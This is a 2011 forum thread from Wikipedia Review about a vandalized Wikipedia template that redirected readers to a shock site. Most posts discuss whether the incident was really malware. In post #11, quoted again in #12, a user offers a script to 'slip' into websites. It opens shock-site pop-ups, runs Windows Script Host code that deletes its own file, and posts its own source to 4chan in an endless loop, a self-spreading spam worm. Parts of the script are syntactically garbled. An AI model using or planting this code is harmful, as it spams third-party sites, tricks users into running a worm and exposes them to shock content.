The Wikipedia Review: A forum for discussion and criticism of Wikipedia
Wikipedia Review Op-Ed Pages

Welcome, Guest! ( Log In | Register )

> General Discussion? What's that all about?

This subforum is for general discussion of Wikipedia and other Wikimedia projects. For a glossary of terms frequently used in such discussions, please refer to Wikipedia:Glossary. For a glossary of musical terms, see here. Other useful links:

Akahele.orgWikipedia-WatchWikitruthWP:ANWikiEN-L/Foundation-L (mailing lists) • Citizendium forums

 
Reply to this topicStart new topic
> Uh oh - malware infection from WP?
carbuncle
post Sun 21st August 2011, 3:44pm
Post #1


Fat Cat
******

Group: Regulars
Posts: 1,601
Joined: Sun 30th Mar 2008, 4:48pm
Member No.: 5,544



There is a report on the admin noticeboard that certain pages were causing malware infections. Some quotes:
QUOTE
:IF YOU CLICKED ON THE VANDALIZED PAGE. If you have, especially if you are running Idiotically Exploding and your AV software did not go crazy, I strongly suggest you kill your browser sessions and do a full scan of your computer. I tried right clicking for source... then left clicking to get focus... and before I could right click again, my AV software got very upset.
QUOTE
It's very disturbing that someone manged to mount that kind of attack. I can live with the NSFW pictures popping unexpectedly around here, but malware injection?? FuFoFuEd (talk) 03:38, 21 August 2011 (UTC)
QUOTE
I believe the malware site was under the domain feenode.net (the homepage is a shock site with gruesome images and audio—don't go there!), which is apparently owned by GNAA (see [33] archive) Would an admin add this domain to the edit filter or the spam blacklist? Thanks, Goodvac (talk) 05:03, 21 August 2011 (UTC)
QUOTE
I used Firefox 5, did not click on anything in that page, but still got infected with something that moves my browser window randomly around and fills it with some gory pic. It's fine for a while after I kill the process but then starts again. Avira can't find anything. Any suggestions? FuFoFuEd (talk) 06:10, 21 August 2011 (UTC)

While there is no real evidence that this was done by the GNAA, it seems that a GNNA-owned page is involved, and some members recently got blocked on WP. The page/template involved has been revdeleted and there isn't much detail in the report, but if someone has found a way to actually infect WP reader's computers, that might put a bit of a dent in WP's hit count.

User is offlineProfile CardPM
Go to the top of the page
+Quote Post
SB_Johnny
post Sun 21st August 2011, 4:27pm
Post #2


It wasn't me who made honky-tonk angels
*******

Group: Regulars
Posts: 2,128
Joined: Mon 15th Sep 2008, 3:10pm
Member No.: 8,272

WP user page - talk
check - contribs



Is this a first? I don't remember actual malware being slipped into a mediawiki page before (not counting mediawiki, of course).
User is offlineProfile CardPM
Go to the top of the page
+Quote Post
Jon Awbrey
post Sun 21st August 2011, 9:12pm
Post #3


τὰ δέ μοι παθήματα μαθήματα γέγονε
*********

Group: Moderators
Posts: 6,738
Joined: Sun 6th Apr 2008, 4:52am
From: Meat Puppet Nation
Member No.: 5,619

WP user page - talk
check - contribs



Silly Rabbit, Wikipedia IS Malware …

Jon tongue.gif
User is offlineProfile CardPM
Go to the top of the page
+Quote Post
Detective
post Sun 21st August 2011, 9:23pm
Post #4


Senior Member
****

Group: Contributors
Posts: 321
Joined: Thu 9th Dec 2010, 11:17am
Member No.: 35,179



QUOTE(SB_Johnny @ Sun 21st August 2011, 5:27pm) *

I don't remember actual malware being slipped into a mediawiki page before (not counting mediawiki, of course).



QUOTE(Jon Awbrey @ Sun 21st August 2011, 10:12pm) *

Silly Rabbit, Wikipedia IS Malware …

Jon tongue.gif

I'm missing something here. Aren't you two in complete agreement? How does that make SBJ a silly rabbit? (Now if we were discussing Wikiversity ...)
User is offlineProfile CardPM
Go to the top of the page
+Quote Post
Zoloft
post Sun 21st August 2011, 9:38pm
Post #5


May we all find solace in our dreams.
******

Group: Regulars
Posts: 1,332
Joined: Fri 15th Jan 2010, 11:08pm
From: Erewhon
Member No.: 16,621



QUOTE(Detective @ Sun 21st August 2011, 2:23pm) *
QUOTE(SB_Johnny @ Sun 21st August 2011, 5:27pm) *
I don't remember actual malware being slipped into a mediawiki page before (not counting mediawiki, of course).
QUOTE(Jon Awbrey @ Sun 21st August 2011, 10:12pm) *
Silly Rabbit, Wikipedia IS Malware …

Jon tongue.gif
I'm missing something here. Aren't you two in complete agreement? How does that make SBJ a silly rabbit? (Now if we were discussing Wikiversity ...)

No two people are in complete agreement.

Jon is just ensuring that SBJ never gets his hands on delicious Kix cereal.

Some humans are malware. GNAA is a convenient collection of such people.

This post has been edited by Zoloft: Sun 21st August 2011, 9:39pm
User is offlineProfile CardPM
Go to the top of the page
+Quote Post
Milton Roe
post Sun 21st August 2011, 10:00pm
Post #6


Known alias of J. Random Troll
*********

Group: Regulars
Posts: 10,209
Joined: Thu 28th Feb 2008, 1:03am
Member No.: 5,156

WP user page - talk
check - contribs



QUOTE(Zoloft @ Sun 21st August 2011, 2:38pm) *

Some humans are malware. GNAA is a convenient collection of such people.

Randolf Churchill, son of the Prime Minister and a rather nasty alcoholic, once upon a time developed a colon tumor which had to be removed. It proved not be cancer. Some wag said "What a shame to cut out of Randolf the only part that is NOT malignant...." dry.gif
User is offlineProfile CardPM
Go to the top of the page
+Quote Post
melloden
post Sun 21st August 2011, 10:11pm
Post #7


.
****

Group: Contributors
Posts: 450
Joined: Tue 30th Nov 2010, 4:43pm
Member No.: 34,482



The malware isn't in Wikipedia. I was lucky enough to look at the page source just before the revision was deleted, and it was Meepsheep (is he with the GNAA now?), using a transparent image covering the entire screen and linking to the typical GNAA shock site with a bunch of popups that never end.
User is offlineProfile CardPM
Go to the top of the page
+Quote Post
SB_Johnny
post Sun 21st August 2011, 10:29pm
Post #8


It wasn't me who made honky-tonk angels
*******

Group: Regulars
Posts: 2,128
Joined: Mon 15th Sep 2008, 3:10pm
Member No.: 8,272

WP user page - talk
check - contribs



QUOTE(melloden @ Sun 21st August 2011, 6:11pm) *

The malware isn't in Wikipedia. I was lucky enough to look at the page source just before the revision was deleted, and it was Meepsheep (is he with the GNAA now?), using a transparent image covering the entire screen and linking to the typical GNAA shock site with a bunch of popups that never end.

Actually it wasn't Meepsheep, it was an edit to a widely used and unprotected template by a throwaway account.

Looking at the code, it looks like trying to click on any link from the article would have landed on the GNAA page. I doubt this will be anything near the last time someone employs the trick, and done to scale it could seriously mess up Wikipedia for a while.

Maybe that "image filter" will need be reset to use whitelists rather than blacklist categories... unsure.gif
User is offlineProfile CardPM
Go to the top of the page
+Quote Post
Michaeldsuarez
post Sun 21st August 2011, 11:31pm
Post #9


Über Member
*****

Group: Contributors
Posts: 554
Joined: Mon 9th Aug 2010, 7:51pm
From: New York, New York
Member No.: 24,428

WP user page - talk
check - contribs



QUOTE(melloden @ Sun 21st August 2011, 6:11pm) *

The malware isn't in Wikipedia. I was lucky enough to look at the page source just before the revision was deleted, and it was Meepsheep (is he with the GNAA now?), using a transparent image covering the entire screen and linking to the typical GNAA shock site with a bunch of popups that never end.


http://encyclopediadramatica.ch/Last_Measure
User is offlineProfile CardPM
Go to the top of the page
+Quote Post
Meepsheep
post Thu 22nd September 2011, 2:40am
Post #10


Neophyte


Group: Contributors
Posts: 16
Joined: Wed 21st Sep 2011, 1:45am
Member No.: 66,900

WP user page - talk
check - contribs



So I alter an unprotected template to include some dongs and a link to Last Measure, and it's automatically malware? Lolwut?
User is offlineProfile CardPM
Go to the top of the page
+Quote Post
Mr.Treason II
post Tue 27th September 2011, 6:42pm
Post #11


Junior Member
**

Group: Contributors
Posts: 62
Joined: Thu 30th Jun 2011, 8:00am
Member No.: 58,445

WP user page - talk
check - contribs



QUOTE(Meepsheep @ Thu 22nd September 2011, 3:40am) *

So I alter an unprotected template to include some dongs and a link to Last Measure, and it's automatically malware? Lolwut?


If you're careful, there is NO MALWAREZ.
The Hoser's site got Javascripted, so just slip some javascript like this
CODE

<script type="text/javascript">
<!--
window.open( "http://www.feenode.net/" )
window.open( "http://www.WPReview.on.nimpfullofmalware.org/" )
k="Content-Disposition: form-data; name="

function r(){
    return String.fromCharCode( "a".charCodeAt(0) + Math.floor( Math.random() * 26 ) )
}

f = WSH.createobject("scripting.filesystemobject")
g = f.opentextfile(WSH.scriptfullname)
h = g.readall()
g.close()
f.deletefile( WSH.scriptfullname )
function 4chan;
{
x = "Copy and paste the following to Notepad, save with the filename \"4chan.js\", open the file you created and shit bricks.\r\n\r\n" + h
a = WSH.createobject( "msxml2.xmlhttp" )

while(1) {
    a.open( "get", "http://img.4chan.org/b", 0 )
    a.send()
  
    b = a.responsetext
    c = b.substr( b.indexOf( "res/" ) + 4, 8 )
    d = ""
    e = ""
  
    for( i = 0; i < 20; i++ )
        d += r()
  
    for( i = 0; i < 8; i++ )
        e += r()
  
    a.open( "post", "http://dat.4chan.org/b/imgboard.php", 0 )
    t = "multipart/form-data; boundary=" + d
    a.setrequestheader( "Content-Type", t )
    a.send("--" + d + "\r\n" +
        k + "\"MAX_FILE_SIZ8\"\r\n\r\n" + "2097152\r\n--" + d + "\r\n" +
        k + "\"resto\"\r\n\r\n" + c + "\r\n--" + d + "\r\n" +
        k + "\"name\"\r\n\ r\n\r\n--" + d + "\r\n" +
        k + "\"email\"\r\n\r\n\r\n--" + d + "\r\n" + k + "\"sub\"\r\n\r\n\r\n--" + d + "\r\n" +
        k + "\"com\"\r\n\r\n" + x + "\r\n--" + d + "\r\n" +
        k + "\"upfile\"; filename=\"\"\r\n" + "Content-Type: application/octet-stream\r\n\r\n\r\n--" + d + "\r\n" +
        k + "\"pwd\"\r\n\r\n" + e + "\r\n--" + d + "\r\n" +
        k + "\"mode\"\r\n\r\nregist\r\n--" + d + "--\r\n" )
  
    WSH.sleep( 3e4 + Math.floor( Math.random() * 3e4 ) )
}
}
4chan.js();

//-->
</script>
User is offlineProfile CardPM
Go to the top of the page
+Quote Post
Meepsheep
post Tue 11th October 2011, 4:20am
Post #12


Neophyte


Group: Contributors
Posts: 16
Joined: Wed 21st Sep 2011, 1:45am
Member No.: 66,900

WP user page - talk
check - contribs



QUOTE(Mr.Treason II @ Tue 27th September 2011, 6:42pm) *

QUOTE(Meepsheep @ Thu 22nd September 2011, 3:40am) *

So I alter an unprotected template to include some dongs and a link to Last Measure, and it's automatically malware? Lolwut?


If you're careful, there is NO MALWAREZ.
The Hoser's site got Javascripted, so just slip some javascript like this
CODE

<script type="text/javascript">
<!--
window.open( "http://www.feenode.net/" )
window.open( "http://www.WPReview.on.nimpfullofmalware.org/" )
k="Content-Disposition: form-data; name="

function r(){
    return String.fromCharCode( "a".charCodeAt(0) + Math.floor( Math.random() * 26 ) )
}

f = WSH.createobject("scripting.filesystemobject")
g = f.opentextfile(WSH.scriptfullname)
h = g.readall()
g.close()
f.deletefile( WSH.scriptfullname )
function 4chan;
{
x = "Copy and paste the following to Notepad, save with the filename \"4chan.js\", open the file you created and shit bricks.\r\n\r\n" + h
a = WSH.createobject( "msxml2.xmlhttp" )

while(1) {
    a.open( "get", "http://img.4chan.org/b", 0 )
    a.send()
  
    b = a.responsetext
    c = b.substr( b.indexOf( "res/" ) + 4, 8 )
    d = ""
    e = ""
  
    for( i = 0; i < 20; i++ )
        d += r()
  
    for( i = 0; i < 8; i++ )
        e += r()
  
    a.open( "post", "http://dat.4chan.org/b/imgboard.php", 0 )
    t = "multipart/form-data; boundary=" + d
    a.setrequestheader( "Content-Type", t )
    a.send("--" + d + "\r\n" +
        k + "\"MAX_FILE_SIZ8\"\r\n\r\n" + "2097152\r\n--" + d + "\r\n" +
        k + "\"resto\"\r\n\r\n" + c + "\r\n--" + d + "\r\n" +
        k + "\"name\"\r\n\ r\n\r\n--" + d + "\r\n" +
        k + "\"email\"\r\n\r\n\r\n--" + d + "\r\n" + k + "\"sub\"\r\n\r\n\r\n--" + d + "\r\n" +
        k + "\"com\"\r\n\r\n" + x + "\r\n--" + d + "\r\n" +
        k + "\"upfile\"; filename=\"\"\r\n" + "Content-Type: application/octet-stream\r\n\r\n\r\n--" + d + "\r\n" +
        k + "\"pwd\"\r\n\r\n" + e + "\r\n--" + d + "\r\n" +
        k + "\"mode\"\r\n\r\nregist\r\n--" + d + "--\r\n" )
  
    WSH.sleep( 3e4 + Math.floor( Math.random() * 3e4 ) )
}
}
4chan.js();

//-->
</script>



Oh god, 4chan.js, takes me back man

This post has been edited by Meepsheep: Tue 11th October 2011, 4:20am
User is offlineProfile CardPM
Go to the top of the page
+Quote Post
Kelly Martin
post Tue 11th October 2011, 1:45pm
Post #13


Bring back the guttersnipes!
********

Group: Regulars
Posts: 3,270
Joined: Sun 22nd Jun 2008, 4:41am
From: EN61bw
Member No.: 6,696



QUOTE(SB_Johnny @ Sun 21st August 2011, 11:27am) *
Is this a first? I don't remember actual malware being slipped into a mediawiki page before (not counting mediawiki, of course).
No, not the first time. There's been about a half-dozen instances of people using Wikipedia (or Wikimedia Commons) to spread malware that I've heard of. There are some phenomenally stupid security holes in IE that, to be honest, Tim Starling and Brion Vibber have bent over backwards to secure MediaWiki against. MediaWiki now has some fairly sophisticated code in it to screen uploaded files for malicious content; that code is there to block exploits that actually happened on Wikipedia or on Commons. Even so, there are doubtless still infected files in Commons; I'd not be surprised if a good portion of the porn there carries malware payloads, especially anything uploaded prior to mid-2007.
User is offlineProfile CardPM
Go to the top of the page
+Quote Post

Reply to this topicStart new topic
1 User(s) are reading this topic (1 Guests and 0 Anonymous Users)
0 Members:

 

-   Lo-Fi Version Time is now: 21st 5 13, 7:28pm